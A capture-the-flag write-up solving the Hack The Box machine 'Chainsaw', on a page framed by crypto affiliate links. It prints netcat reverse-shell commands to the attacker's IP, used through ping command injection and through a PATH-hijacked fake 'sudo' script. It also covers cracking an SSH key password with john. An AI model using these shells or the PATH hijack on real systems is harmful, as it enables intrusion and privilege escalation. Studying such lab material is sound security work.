Chainsaw — HacktheBox – sif0

Free Bitcoins: FreeBitcoin | BonusBitcoin

Coins Kaufen: Bitcoin.deAnycoinDirektCoinbaseCoinMama (mit Kreditkarte)Paxfull

Handelsplätze / Börsen: Bitcoin.de | KuCoinBinanceBitMexBitpandaeToro

Lending / Zinsen erhalten: Celsius NetworkCoinlend (Bot)

Cloud Mining: HashflareGenesis MiningIQ Mining


Since I am able to execute a ping, and seems like it’s being passed to bash, I can add a ‘&’ and put a malicious command like:

nc -e /bin/sh 10.10.14.72 9003

Running that line in the Python interpreter:

I then get a reverse shell as the user administrator, and appropriately spawn a tty using Python:

Note that the address changes every time the machines boots. Just connect to the FTP server and download the address.txt file from it.

administrator → bobby

Checking user directories under /home, I see 2 users called administrator and bobby. Note that I don’t have read access on the bobby directory:

Checking what’s under the directory of administrator, I see a chainsaw-emp.csv file. I transfer it to my machine by using cat and piping its output to nc(netcat). I then check the integrity of the file:

Opening chainsaw-emp.csv:

Employees,Active,Position
arti@chainsaw,No,Network Engineer
bryan@chainsaw,No,Java Developer
bobby@chainsaw,Yes,Smart Contract Auditor
lara@chainsaw,No,Social Media Manager
wendy@chainsaw,No,Mobile Application Developer

I see a list of possible usernames and their position. I then try reading /etc/passwd to gain more information about the users:

It seems that the default shell for arti, lara, bryan, and wendy is /bin/false, which basically means that they don’t have a shell when they login. Note also that their home directories are non-existent since only administrator and bobby directories are under /home. Bobby has /bin/bash as its deafault shell.

I see that there is a gen.py file and a directory called pub:

administrator@chainsaw:/home/administrator/maintain$ cat gen.py
cat gen.py
#!/usr/bin/python
from Crypto.PublicKey import RSA
from os import chmod
import getpass
def generate(username,password):
key = RSA.generate(2048)
pubkey = key.publickey()
pub = pubkey.exportKey('OpenSSH')
priv = key.exportKey('PEM',password,pkcs=1)
filename = "{}.key".format(username)with open(filename, 'w') as file:
chmod(filename, 0600)
file.write(priv)
file.close()
with open("{}.pub".format(filename), 'w') as file:
file.write(pub)
file.close()
# TODO: Distribute keys via ProtonMailif __name__ == "__main__":
while True:
username = raw_input("User: ")
password = getpass.getpass()
generate(username,password)

It seems that gen.py just generates a private and public key. Note that there is a TODO which says to distribute keys via ProtonMail.

Checking the directory pub, I see existing public keys for the mentioned users, but not private keys.

What’s interesting is the /.ipfs folder under the administrator directory. IPFS stands for interplanetary file system. You can learn more about it from these resources: https://ipfs.io/ and https://flyingzumwalt.gitbooks.io/decentralized-web-primer/install-ipfs/lessons/initialize-repository.html

Since there may be files uner this directory, I run grep to check for any files that mentioned bobby(since keys are to be distributed).

grep -r bobby .

Note that there is an interesting line where a filename of bobby.key.enc is mentioned. I used cat to read the file:

I can see that it’s a message from the IT department to bobby regarding his Ubuntu Server Private RSA key. Checking the contents:

It seems like its base64 encoded. I decode it and save the file to bobby.key.decoded:

Since it is an encrypted private key, I can use ssh2john to convert it to a crackable format for john:

I then use john to crack the password for the private key:

john --wordlist=/usr/share/wordlists/rockyou.txt bobby.key.john

John then cracks the private key and finds that it uses the password jackychain.

I then try to login using the private key, using the password jackychain:

And I successfully login and now I can read user.txt

bobby@chainsaw:~$ cat user.txt 
af8d9df99....

bobby → root:

Checking for files under the bobby directory, I see a binary called ChainsawClub that has its setuid bit set and another set of json and sol files.

I try to execute the binary:

It asks for a username:

After trying username of test and password test, it doesn’t work. What I did is to just see the flow of the binary.

Reading ChainsawClub.sol:

It has a string username as nobody and a password, which looks like a hash. I check for the functions and it’s more complicated than the json and sol files I had from the initial step(from the FTP).

I also run strings on ChainsawClub binary:

There is an interesting line from the output.

sudo -i -u root /root/ChainsawClub/dist/ChainsawClub/ChainsawClub

This is improper as I can create a file called “sudo”, add it to the PATH variable so that when I run the ChainsawClub binary and it calls sudo, it will look for any binary called sudo, prioritizing left to right of the variable PATH. Checking the PATH using env:

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

I first include the working directory to the PATH:

export PATH=.:$PATH

Checking the modified PATH thru the env command:

PATH=.:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

Notice that the PATH was prepended with “.”

I then setup tcpdump to listen for ICMP packets on the interface tun0, and run the binary ChainsawClub:

Notice that I get ping to my machine. I then check if nc (netcat) is installed on the machine. Then I try to get a reverse shell just to check if I am able to:

Since I am able to get a connection as the user bobby, I then edit the contents of the “sudo” file to:

#!/bin/bashnc -e /bin/sh 10.10.14.72 9001

Now when I run the ChainsawClub binary, when it calls “sudo”, rather than callling /usr/bin/sudo, it calls the sudo in the current directory.

And now I get a shell. When I run the command id, I see that my uid=0(root).

When I read root.txt, the contents is not the root flag:

root@chainsaw:/root# cat root.txt
cat root.txt
Mine deeper to get rewarded with root coin (RTC)...

Extra challenge:

Since I am root but still do not have the root flag, I looked for ways to find it. I first set up a proper shell:

I then looked for interesting binaries that can hint to what should be done. After a while, I was able find the root flag by using bmap and using the mode slack to see the root flag. You can read more about it here: https://www.security-box.org/article35/slack-space-hiding

So that’s how I solved Chainsaw from Hack the Box. I learned tons of stuff solving this box, and the techniques required was very new for me(interaction with Ethereum client, IPFS, and Bmap slack space hiding).

I hoped you learned something from this. Thanks for reading my write-up! Cheers! 🍺

Free Bitcoins: FreeBitcoin | BonusBitcoin

Coins Kaufen: Bitcoin.deAnycoinDirektCoinbaseCoinMama (mit Kreditkarte)Paxfull

Handelsplätze / Börsen: Bitcoin.de | KuCoinBinanceBitMexBitpandaeToro

Lending / Zinsen erhalten: Celsius NetworkCoinlend (Bot)

Cloud Mining: HashflareGenesis MiningIQ Mining

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close